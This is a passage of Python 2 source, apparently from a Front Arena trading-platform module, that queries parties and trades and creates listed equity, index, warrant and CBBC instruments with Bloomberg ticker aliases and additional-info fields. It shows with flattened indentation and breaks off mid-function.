for issuer in ael.Party.select("type = 'Issuer'"):
issuers.append(issuer.display_id())
issuers.sort()
return issuers
def getAllStatus():
status = []
status.append('Simulated')
status.append('FO Confirmed')
status.sort()
return status
def get_yesno():
ret = []
ret.append("Y")
ret.append("N")
return ret
def get_feedcode():
ret = []
ret.append(LOCAL_EXCHANGE_CODE)
ret.append(BLOOMBERG_TICKER)
ret.append(ISIN)
return ret
'''
def getHorizonPfbyFAPf(fa_prfid):
horizon_pf = ''
strSql = """select a.value
from portfolio pf, additionalinfo a, additionalinfospec s
where pf.prfnbr = a.recaddr and a.addinf_specnbr = s.specnbr and s.field_name = 'HORIZON_PORTFOLIO'
and s.rec_type = 'Portfolio'
and pf.prfid = \'%s\'""" % (fa_prfid)
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
for table in buf:
for row in table:
horizon_pf = row[0].strip()
break
break
return horizon_pf
def formatFOTradeId(fo_trade_id, channel):
#return channel.strip() + '-' + fo_trade_id + '-' + ael.date_today().to_string('%Y%m%d')
return fo_trade_id + '-' + ael.date_today().to_string('%Y%m%d')
def getTrade(fo_trade_id, channel, trd_create_dt, trd_create_dt_plus1):
trdnbr = -1
fo_trade_id = formatFOTradeId(fo_trade_id, channel)
'''
strSql = """select trdnbr
from trade t, additionalinfo at, additionalinfospec st, additionalinfo ac, additionalinfospec sc
where t.trdnbr = at.recaddr and at.addinf_specnbr = st.specnbr and st.field_name = 'FO Trade Id' and st.rec_type = 'Trade'
and t.trdnbr = ac.recaddr and ac.addinf_specnbr = sc.specnbr and sc.field_name = 'Trade Source' and sc.rec_type = 'Trade'
and at.value = \'%s\' and ac.value = \'%s\' and status ~= 'Void'""" % (fo_trade_id, channel)
'''
strSql = """select trdnbr
from trade t
where creat_time >= \'%s\' and creat_time < \'%s\'
and to_string(add_info(t,'FO Trade Id_1'), add_info(t,'FO Trade Id_2'), add_info(t,'FO Trade Id_3')) = \'%s\'
and add_info(t,'Trade Source') = \'%s\' and status ~= 'Void'""" % (trd_create_dt, trd_create_dt_plus1, fo_trade_id, channel)
#print channel.strip(), 'louis'
#print strSql
rs = ael.asql(strSql)
insid = ''
columns, buf = rs
for table in buf:
for row in table:
trdnbr = row[0]
break
break
return trdnbr
def getBroker(ptyid):
strSql = """SELECT pty.ptyid
FROM party pty
WHERE pty.ptyid = \'%s\' and type = 'Broker' """ % (ptyid)
#print strSql
rs = ael.asql(strSql)
ptyid = ''
columns, buf = rs
for table in buf:
for row in table:
ptyid = row[0]
return ptyid
def getCounterparty(ptyid):
strSql = """SELECT pty.ptyid
FROM party pty
WHERE pty.ptyid = \'%s\' and type = 'Counterparty' """ % (ptyid)
#print strSql
rs = ael.asql(strSql)
ptyid = ''
columns, buf = rs
for table in buf:
for row in table:
ptyid = row[0]
return ptyid
def createInstrumentAlias(insid, aliasType, aliasValue):
ael_ins = ael.Instrument[insid]
acm_ins = acm.FInstrument[insid]
if ael_ins != None:
for aliase in acm_ins.Aliases():
if aliase.Type().Name() == 'BB_TICKER':
if aliase.Alias().strip() != '': # no override existing
return
ael_ins_clone = ael_ins.clone()
a = ael.InstrumentAlias.new(ael_ins_clone)
a.type = aliasType
a.alias = aliasValue
a.commit()
ael.poll()
else:
print 'Instrument %s cannot be found, so no alias is added' % (insid)
def quoteToUnitValue(insid, quote):
acmIns = acm.FInstrument[insid]
return acmIns.QuoteToUnitValue(1, quote, 1)
def unitValueToQuote(insid, quote):
acmIns = acm.FInstrument[insid]
return acmIns.UnitValueToQuote(1, quote, 1)
def quoteTo(ins, date, quoteType, quote):
insC = ins.clone()
insC.quote_type = quoteType
premium = insC.premium_from_quote(date, quote)
return premium
def FeedQuoteToFAQuote(insid, feedprice, quot, Source):
faPrice = 0
if quot == 'FA':
faPrice = feedprice
elif quot == 'PER_UNIT':
faPrice = unitValueToQuote(insid, feedprice)
else:
faPrice = feedprice
return faPrice
def getAcquirer(ptyid):
strSql = """SELECT pty.ptyid
FROM party pty
WHERE pty.ptyid = \'%s\' and type = 'Intern Dept' """ % (ptyid)
#print strSql
rs = ael.asql(strSql)
ptyid = ''
columns, buf = rs
for table in buf:
for row in table:
ptyid = row[0]
return ptyid
def getFullIndexLocalCodeByMapping(localcode, insMic):
localcodes = ''
strSql = """select li.value
from instrument i,
AdditionalInfoSpec mis, AdditionalInfo mi,
AdditionalInfoSpec lis, AdditionalInfo li
where i.insaddr = mi.recaddr
and i.generic = \'No\'
and mi.addinf_specnbr = mis.specnbr
and mis.field_name = 'MIC'
and mi.value = '%s'
and i.insaddr = li.recaddr
and li.addinf_specnbr = lis.specnbr
and lis.field_name = 'Local Exchange Code'
and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (insMic, localcode, localcode+',%', '%,'+localcode)
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
for table in buf:
for row in table:
localcodes = row[0].strip()
break
if localcodes == '':
return localcode
else:
arraycodes = localcodes.split(",")
return arraycodes[0]
def getInstrumentByIndAttributes(insMic, insProdType, mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval):
insid = ''
insProdType = insProdType.upper()
mssd_callput = mssd_callput.upper()
yy = mssd_exp_month[0:4]
mm = mssd_exp_month[4:6]
fm_exp_day = ael.date(yy+'-'+mm+'-01').to_string("%Y%m%d")
to_exp_day = ael.date(yy+'-'+mm+'-01').add_delta(0, 1, 0).add_days(-1).to_string("%Y%m%d")
#print fm_exp_day, to_exp_day
#print insProdType
if insProdType == 'OPTION':
if mssd_callput == 'CALL':
call_option = 'Yes'
else:
call_option = 'No'
strSql = """select i.insid
from
Instrument i,
Instrument ui,
AdditionalInfoSpec lis,
AdditionalInfo li
where i.instype = 'Option'
and i.exp_day >= \'%s\' and i.exp_day <= \'%s\'
and i.call_option = \'%s\'
and i.strike_price = %s
and ui.insaddr = li.recaddr
and li.addinf_specnbr = lis.specnbr
and lis.field_name = 'Local Exchange Code'
and i.generic = \'No\'
and i.und_insaddr = ui.insaddr
and i.contr_size = %s
and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (fm_exp_day, to_exp_day, call_option, mssd_strike, mssd_pointval, mssd_underlying, mssd_underlying+',%', '%,'+mssd_underlying)
elif insProdType == 'FUTURE':
strSql = """select i.insid
from
Instrument i,
Instrument ui,
AdditionalInfoSpec lis,
AdditionalInfo li
where i.instype = 'Future/Forward'
and i.exp_day >= \'%s\' and i.exp_day <= \'%s\'
and ui.insaddr = li.recaddr
and li.addinf_specnbr = lis.specnbr
and lis.field_name = 'Local Exchange Code'
and i.generic = \'No\'
and i.und_insaddr = ui.insaddr
and i.contr_size = %s
and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (fm_exp_day, to_exp_day, mssd_pointval, mssd_underlying, mssd_underlying+',%', '%,'+mssd_underlying)
else:
return ''
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
for table in buf:
for row in table:
insid = row[0].strip()
return insid
return insid
def getInstrumentByMapping(localcode, insMic):
insid = ''
strSql = """select i.insid
from instrument i,
AdditionalInfoSpec mis, AdditionalInfo mi,
AdditionalInfoSpec lis, AdditionalInfo li
where i.insaddr = mi.recaddr
and i.generic = \'No\'
and mi.addinf_specnbr = mis.specnbr
and mis.field_name = 'MIC'
and mi.value = '%s'
and i.insaddr = li.recaddr
and li.addinf_specnbr = lis.specnbr
and lis.field_name = 'Local Exchange Code'
and (li.value = '%s' or li.value like '%s' or li.value like '%s')""" % (insMic, localcode, localcode+',%', '%,'+localcode)
#print strSql
rs = ael.asql(strSql)
columns, buf = rs
for table in buf:
for row in table:
insid = row[0].strip()
return insid
return insid
def CreateInsAdditionalInfo(ins_new_insid, insMic, insDesc, insName, localcode, insType, insUnderlying_mktId):
acm_ins = acm.FInstrument[ins_new_insid]
if insMic.strip() != '':
if acm_ins.AdditionalInfo().MIC() == None:
addInfoMicSpec = acm.FAdditionalInfoSpec['MIC']
addInfoMic = acm.FAdditionalInfo()
addInfoMic.AddInf(addInfoMicSpec.Oid())
addInfoMic.Recaddr(acm_ins.Oid())
addInfoMic.FieldValue(insMic)
addInfoMic.Commit()
else:
if acm_ins.AdditionalInfo().MIC().strip() == '':
acm_ins.AdditionalInfo().MIC(insMic)
if insMic in ('XHKG','XHKF'):
priceSource = 'Bloomberg_5PM'
else:
priceSource = 'EDD_OTC'
else:
priceSource = 'EDD_OTC'
if priceSource != '':
if acm_ins.AdditionalInfo().Snaps_Pce_Source() == None:
addInfoPSSpec = acm.FAdditionalInfoSpec['Snaps Pce Source']
addInfoPS = acm.FAdditionalInfo()
addInfoPS.AddInf(addInfoPSSpec.Oid())
addInfoPS.Recaddr(acm_ins.Oid())
addInfoPS.FieldValue(priceSource)
addInfoPS.Commit()
else:
if acm_ins.AdditionalInfo().Snaps_Pce_Source().strip() == '':
acm_ins.AdditionalInfo().Snaps_Pce_Source(priceSource)
if insDesc.strip() != '':
#print 'desc', insDesc
if acm_ins.AdditionalInfo().Ins_Description() == None:
addInfoDescSpec = acm.FAdditionalInfoSpec['Ins Description']
addInfoDesc = acm.FAdditionalInfo()
addInfoDesc.AddInf(addInfoDescSpec.Oid())
addInfoDesc.Recaddr(acm_ins.Oid())
addInfoDesc.FieldValue(insDesc)
addInfoDesc.Commit()
else:
if acm_ins.AdditionalInfo().Ins_Description().strip() == '':
acm_ins.AdditionalInfo().Ins_Description(insDesc)
if localcode != '':
if acm_ins.AdditionalInfo().Local_Exchange_Code() == None:
addInfoLocalCodeSpec = acm.FAdditionalInfoSpec['Local Exchange Code']
addInfoLocalCode = acm.FAdditionalInfo()
addInfoLocalCode.AddInf(addInfoLocalCodeSpec.Oid())
addInfoLocalCode.Recaddr(acm_ins.Oid())
addInfoLocalCode.FieldValue(localcode)
addInfoLocalCode.Commit()
else:
if acm_ins.AdditionalInfo().Local_Exchange_Code().strip() == '':
acm_ins.AdditionalInfo().Local_Exchange_Code(localcode)
if insName != '':
#print 'name', insName
if acm_ins.AdditionalInfo().Ins_Short_Name() == None:
addInfoShortNameSpec = acm.FAdditionalInfoSpec['Ins Short Name']
addInfoShortName = acm.FAdditionalInfo()
addInfoShortName.AddInf(addInfoShortNameSpec.Oid())
addInfoShortName.Recaddr(acm_ins.Oid())
addInfoShortName.FieldValue(insName)
addInfoShortName.Commit()
else:
if acm_ins.AdditionalInfo().Ins_Short_Name().strip() == '':
acm_ins.AdditionalInfo().Ins_Short_Name(insName)
if insType in ('OPTION', 'FUTURE'):
if insUnderlying_mktId != '':
comdycode = insUnderlying_mktId
else:
if localcode != '':
len_localcode = len(localcode)
if len_localcode >= LEN_COMDY_CODE:
comdycode = localcode[0:LEN_COMDY_CODE]
else:
comdycode = localcode
if acm_ins.AdditionalInfo().Commodity_Code() == None:
addInfoComdyCodeSpec = acm.FAdditionalInfoSpec['Commodity Code']
addInfoComdyCode = acm.FAdditionalInfo()
addInfoComdyCode.AddInf(addInfoComdyCodeSpec.Oid())
addInfoComdyCode.Recaddr(acm_ins.Oid())
addInfoComdyCode.FieldValue(comdycode)
addInfoComdyCode.Commit()
else:
if acm_ins.AdditionalInfo().Commodity_Code().strip() == '':
acm_ins.AdditionalInfo().Commodity_Code(comdycode)
if insType == 'STOCK':
if acm_ins.AdditionalInfo().SUBJ_TO_STAMP_DUTY() == None:
addInfoStampSpec = acm.FAdditionalInfoSpec['SUBJ_TO_STAMP_DUTY']
addInfoStamp = acm.FAdditionalInfo()
addInfoStamp.AddInf(addInfoStampSpec.Oid())
addInfoStamp.Recaddr(acm_ins.Oid())
addInfoStamp.FieldValue("Yes")
addInfoStamp.Commit()
'''
def createEquityIndexInstr(insCcy, insMic, insDesc, insName, localcode):
insid = ''
prodId = localcode + '@' + insMic
#print prodId
insTemplateId = 'Template EquityIndex'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Name(prodId)
ins_new.Currency(insCcy)
ins_new.Commit()
# Create Stock Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode)
# Create BB_TICKER alias
bb_ticker = localcode + ' Index'
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
'''
'''
def map_bb_exch_code(insCcy):
bb_exch_code = ''
if insCcy == 'HKD':
bb_exch_code = 'HK'
elif insCcy in ('SGD'):
bb_exch_code = 'SP'
return bb_exch_code
'''
def map_bb_exch_code(mic):
bb_exch_code = ''
if mic in ('XHKG','XHKF'):
bb_exch_code = 'HK'
elif mic in ('XSGD'):
bb_exch_code = 'SP'
return bb_exch_code
def getInsidByBBTicker(bb_ticker):
ael_ins = ael.Instrument[bb_ticker]
if ael_ins != None:
return ael_ins.insid.strip()
else:
return ''
def getTemplateBBTicker(insTemplateId, insType, insULType, insMaturity, insCallPut='CALL', insStrikePrice=0):
ins_template = acm.FInstrument[insTemplateId]
# BB_TICKER alias
bb_ticker = ''
for aliase in ins_template.Aliases():
if aliase.Type().Name() == 'BB_TICKER':
bb_ticker = aliase.Alias()
if insType == 'FUTURE':
yy = str(getYear('Future/Forward', insMaturity))
bb_ticker = bb_ticker.replace('my', getMonthCode('Future/Forward', False, insMaturity)+yy[1:2])
elif insType == 'OPTION':
bb_ticker = bb_ticker.replace('mm/dd/yy', ael.date(insMaturity).to_string('%m/%d/%Y'))
if insCallPut == 'CALL' or insCallPut == 'C':
bb_ticker = bb_ticker.replace('[e]', 'C')
else:
bb_ticker = bb_ticker.replace('[e]', 'P')
if insULType == 'INDEX':
bb_ticker = bb_ticker.replace('[x]', str(int(float(insStrikePrice))))
else:
bb_ticker = bb_ticker.replace('[x]', str('{0:.2f}'.format(insStrikePrice)))
else:
bb_ticker = ''
return bb_ticker
def formatBBTicker(mic, insCcy, insType, localcode, insMaturity=None, underlying_insid='', insPointValue=0, insULType='', insCallPut='CALL', insStrikePrice='0'):
bb_ticker = ''
#print insType
if insType in ('STOCK','WARRANT','CBBC'):
#bb_exch_code = map_bb_exch_code(insCcy)
#print mic
bb_exch_code = map_bb_exch_code(mic)
bb_db_code = 'Equity'
bb_ticker = localcode + ' ' + bb_exch_code + ' ' + bb_db_code
elif insType in ('FUTURE'):
if insULType == 'INDEX':
insTemplateId = getIndexFutureTemplate(underlying_insid, insPointValue)
if insTemplateId != '':
bb_ticker = getTemplateBBTicker(insTemplateId, insType, insULType, insMaturity, insCallPut, insStrikePrice)
elif insULType == 'STOCK':
acm_und_ins = acm.FInstrument[underlying_insid]
if acm_und_ins != None:
#bb_exch_code = map_bb_exch_code(acm_und_ins.Currency().Name().strip())
bb_exch_code = map_bb_exch_code(acm_und_ins.AdditionalInfo().MIC().strip())
bb_db_code = 'Equity'
yy = str(getYear('Future/Forward', insMaturity))
if acm_und_ins.AdditionalInfo().Local_Exchange_Code() != None:
bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + '=' + getMonthCode('Future/Forward', False, insMaturity) + yy[1:2] + ' ' + bb_exch_code + ' ' + bb_db_code
elif insType in ('OPTION'):
if insULType == 'INDEX':
insTemplateId = getIndexOptionTemplate(underlying_insid, insPointValue)
if insTemplateId != '':
bb_ticker = getTemplateBBTicker(insTemplateId, insType, insULType, insMaturity, insCallPut, insStrikePrice)
elif insULType == 'STOCK':
acm_und_ins = acm.FInstrument[underlying_insid]
if acm_und_ins != None:
#bb_exch_code = map_bb_exch_code(acm_und_ins.Currency().Name().strip())
bb_exch_code = map_bb_exch_code(acm_und_ins.AdditionalInfo().MIC().strip())
bb_db_code = 'Equity'
if acm_und_ins.AdditionalInfo().Local_Exchange_Code() != None:
if insCallPut == 'CALL' or insCallPut == 'C':
CP = 'C'
else:
CP = 'P'
if acm_und_ins.AdditionalInfo().MIC().strip() == 'XHKG' and acm_und_ins.AdditionalInfo().Local_Exchange_Code().strip() == '939':
bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + 'S ' + bb_exch_code + ' ' + ael.date(insMaturity).to_string('%m/%d/%Y') + ' ' + CP + str(insStrikePrice) + ' ' + bb_db_code
else:
bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + ' ' + bb_exch_code + ' ' + ael.date(insMaturity).to_string('%m/%d/%Y') + ' ' + CP + str(insStrikePrice) + ' ' + bb_db_code
#bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + ' ' + bb_exch_code + ' ' + ael.date(insMaturity).to_string('%m/%d/%Y') + ' ' + CP + str(insStrikePrice) + ' ' + bb_db_code
return bb_ticker
def createStockInstr(insCcy, insMic, insDesc, insName, localcode):
insid = ''
#print 'A'
'''
bb_ticker = ''
bb_exch_code = map_bb_exch_code(insCcy)
bb_db_code = 'Equity'
bb_ticker = localcode + ' ' + bb_exch_code + ' ' + bb_db_code
'''
#bb_ticker = formatBBTicker(insCcy, 'STOCK', localcode)
bb_ticker = formatBBTicker(insMic, insCcy, 'STOCK', localcode)
if bb_ticker == '':
return insid
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'STOCK', '')
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
#prodId = localcode + '@' + insMic
prodId = bb_ticker
# Differentiate ETF and Stock (4May2016)
if insMic == 'XHKG' and IsETF_from_Exchange(localcode):
insTemplateId = 'Template ETF'
else:
insTemplateId = 'Template Stock'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Name(prodId)
ins_new.Currency(insCcy)
ins_new.Commit()
# Create Stock Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'STOCK', '')
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
def createStockFutureInstr(insCcy, insMic, insDesc, localcode, insMaturity, insPointValue, insName, underlying_insid, insULType, insUnderlying_mktId, insDeliveryType):
insid = ''
#prodId = localcode + '@' + insMic
#print 'CC', insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType
#def formatBBTicker(insCcy, insType, localcode, insMaturity=None, underlying_insid='', insPointValue=0, insULType='', insCallPut='CALL', insStrikePrice='0'):
#bb_ticker = formatBBTicker(insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
bb_ticker = formatBBTicker(insMic, insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
if bb_ticker == '':
return insid
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
prodId = bb_ticker
insTemplateId = 'Template Future'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Generic(False)
ins_new.Name(prodId)
ins_new.ExpiryDate(insMaturity)
ins_new.ContractSize(float(insPointValue))
ins_new.Currency(insCcy)
ins_new.Underlying = acm.FInstrument[underlying_insid]
# Underlying Type
insUnderlyingInsType = ins_new.Underlying().InsType()
ins_new.ValuationGrpChlItem('Listed Equity Future')
if insDeliveryType.upper() == 'CASH':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
ins_new.Commit()
# Create Future Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
# Create BB_TICKER alias
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
def getIndexFutureTemplate(underlying_insid, insPointValue):
strSql = """
select i.insid
from instrument i, instrument ui
where i.instype = 'Future/Forward'
and i.generic = 'Yes'
and i.und_insaddr = ui.insaddr
and ui.insid = '%s'
and i.contr_size = %s
""" % (underlying_insid, insPointValue)
#print strSql
rs = ael.asql(strSql)
insid = ''
columns, buf = rs
for table in buf:
for row in table:
insid = row[0].strip()
return insid
def createIndexFutureInstr(insCcy, insMic, insDesc, localcode, insMaturity, insPointValue, insName, underlying_insid, insULType, insUnderlying_mktId):
insid = ''
#prodId = localcode + '@' + insMic
#bb_ticker = formatBBTicker(insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
bb_ticker = formatBBTicker(insMic, insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
if bb_ticker == '':
return insid
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
#prodId = localcode + '@' + insMic
prodId = bb_ticker
insTemplateId = getIndexFutureTemplate(underlying_insid, insPointValue)
if insTemplateId == '':
return insid
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Generic(False)
ins_new.Name(prodId)
ins_new.ExpiryDate(insMaturity)
ins_new.ContractSize(float(insPointValue))
ins_new.Currency(insCcy)
ins_new.Underlying = acm.FInstrument[underlying_insid]
# Underlying Type
insUnderlyingInsType = ins_new.Underlying().InsType()
ins_new.ValuationGrpChlItem('Listed Index Future')
# BB_TICKER alias
if bb_ticker != '':
for aliase in ins_new.Aliases():
if aliase.Type().Name() == 'BB_TICKER':
aliase.Alias(bb_ticker)
break
#if bb_ticker != '':
# createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker, True)
ins_new.Commit()
# Create Future Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
insid = ins_new.Name()
return insid
def createCBBCInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic,
insDesc, localcode, insBullBear, insBarrier, insIssueSize, insIssueDate, insBarrierType, issuer_ptyid, insName, ins_underlying_insid, warrantParity):
insid = ''
#prodId = localcode + '@' + insMic
#bb_ticker = formatBBTicker(insCcy, 'CBBC', localcode, insMaturity, ins_underlying_insid, insPointValue)
bb_ticker = formatBBTicker(insMic, insCcy, 'CBBC', localcode, insMaturity, ins_underlying_insid, insPointValue)
if bb_ticker == '':
return insid
prodId = bb_ticker
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'CBBC', '')
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
insTemplateId = 'Template CBBC'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Name(prodId)
ins_new.Underlying(ins_underlying_insid)
ins_new.ExpiryDate(insMaturity)
ins_new.Currency(insCcy)
insOptionType = insOptionType.upper()
if insOptionType.strip() == '':
if insBullBear == 'BULL':
insOptionType = 'CALL'
else:
insOptionType = 'PUT'
if insOptionType == 'CALL' or insOptionType == 'C':
ins_new.IsCallOption(True)
else:
ins_new.IsCallOption(False)
if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
ins_new.ExerciseType('European')
else:
ins_new.ExerciseType('American')
if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
#ins_new.ContractSize(float(insPointValue))
ins_new.ContractSize(1.0 / float(warrantParity))
ins_new.StrikeCurrency(insCcy)
ins_new.StrikePrice(float(insStrike))
ins_new.ValuationGrpChlItem('CBBC Warrant')
ins_new.Barrier(float(insBarrier))
if insIssueSize != '':
ins_new.TotalIssued(float(insIssueSize))
if insIssueDate != '':
ins_new.IssueDay(insIssueDate)
insBarrierType = insBarrierType.upper()
for exotic in ins_new.Exotics():
if insBarrierType == '':
if insBullBear == 'BULL' and (insOptionType == 'CALL' or insOptionType == 'C'):
exotic.BarrierOptionType('Up & Out')
else:
exotic.BarrierOptionType('Down & Out')
else:
if insBarrierType == 'UPANDOUT':
exotic.BarrierOptionType('Up & Out')
elif insBarrierType == 'DOWNANDOUT':
exotic.BarrierOptionType('Down & Out')
elif insBarrierType == 'DOWNANDIN':
exotic.BarrierOptionType('Down & In')
else:
exotic.BarrierOptionType('UP & In')
if issuer_ptyid != '':
ins_new.Issuer(issuer_ptyid)
ins_new.Commit()
# Create Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'CBBC', '')
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
def createWarrantInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike,
insMic, insDesc, localcode, insIssueSize, insIssueDate, issuer_ptyid, insName, ins_underlying_insid, warrantParity):
insid = ''
#bb_ticker = formatBBTicker(insCcy, 'WARRANT', localcode, insMaturity, ins_underlying_insid, insPointValue)
bb_ticker = formatBBTicker(insMic, insCcy, 'WARRANT', localcode, insMaturity, ins_underlying_insid, insPointValue)
if bb_ticker == '':
return insid
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'WARRANT', '')
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
prodId = bb_ticker
insTemplateId = 'Template Warrant'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Name(prodId)
ins_new.Underlying(ins_underlying_insid)
ins_new.ExpiryDate(insMaturity)
ins_new.Currency(insCcy)
if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
ins_new.IsCallOption(True)
else:
ins_new.IsCallOption(False)
if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
ins_new.ExerciseType('European')
else:
ins_new.ExerciseType('American')
if insDeliveryType.upper() == 'CASH':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
if insIssueSize != '':
ins_new.TotalIssued(float(insIssueSize))
if insIssueDate != '':
ins_new.IssueDay(insIssueDate)
#ins_new.ContractSize(float(insPointValue))
ins_new.ContractSize(1.0 / float(warrantParity))
ins_new.StrikeCurrency(insCcy)
ins_new.StrikePrice(float(insStrike))
ins_new.ValuationGrpChlItem('Listed Warrant')
if issuer_ptyid != '':
ins_new.Issuer(issuer_ptyid)
ins_new.Commit()
# Create Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'WARRANT', '')
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
def getIndexOptionTemplate(underlying_insid, insPointValue):
strSql = """
select i.insid
from instrument i, instrument ui
where i.instype = 'Option'
and i.generic = 'Yes'
and i.und_insaddr = ui.insaddr
and ui.insid = '%s'
and i.contr_size = %s
""" % (underlying_insid, insPointValue)
#print strSql
rs = ael.asql(strSql)
insid = ''
columns, buf = rs
for table in buf:
for row in table:
insid = row[0].strip()
return insid
def createIndexOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
insid = ''
#prodId = localcode + '@' + insMic
#bb_ticker = formatBBTicker(insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
#print 'F'
bb_ticker = formatBBTicker(insMic, insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
if bb_ticker == '':
return insid
#print 'GH'
prodId = bb_ticker
insid = getInsidByBBTicker(bb_ticker)
if insid != '':
CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
if bb_ticker != '':
# Create BB_TICKER alias
createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
return insid
insTemplateId = getIndexOptionTemplate(ins_underlying_insid, insPointValue)
if insTemplateId == '':
return insid
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Generic(False)
ins_new.Name(prodId)
ins_new.Underlying(ins_underlying_insid)
ins_new.ExpiryDate(insMaturity)
ins_new.Currency(insCcy)
if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
ins_new.IsCallOption(True)
else:
ins_new.IsCallOption(False)
if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
ins_new.ExerciseType('European')
else:
ins_new.ExerciseType('American')
if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
ins_new.SettlementType('Cash')
else:
ins_new.SettlementType('Physical Delivery')
ins_new.StrikeCurrency(insCcy)
ins_new.StrikePrice(float(insStrike))
ins_new.ContractSize(float(insPointValue))
# Underlying Type
insUnderlyingInsType = ins_new.Underlying().InsType()
ins_new.ValuationGrpChlItem('Listed Index Option')
# BB_TICKER alias
'''
for aliase in ins_new.Aliases():
if aliase.Type().Name() == 'BB_TICKER':
bb_ticker = aliase.Alias()
#print bb_ticker, getMonthCode('Option', ins_new.IsCallOption(), insMaturity)
bb_ticker = bb_ticker.replace('mm/dd/yy', ael.date(insMaturity).to_string('%m/%d/%Y'))
if ins_new.IsCallOption():
bb_ticker = bb_ticker.replace('[e]', 'C')
else:
bb_ticker = bb_ticker.replace('[e]', 'P')
bb_ticker = bb_ticker.replace('[x]', str(int(ins_new.StrikePrice())))
#print 'B1', bb_ticker
aliase.Alias(bb_ticker)
break
'''
# BB_TICKER alias
if bb_ticker != '':
for aliase in ins_new.Aliases():
if aliase.Type().Name() == 'BB_TICKER':
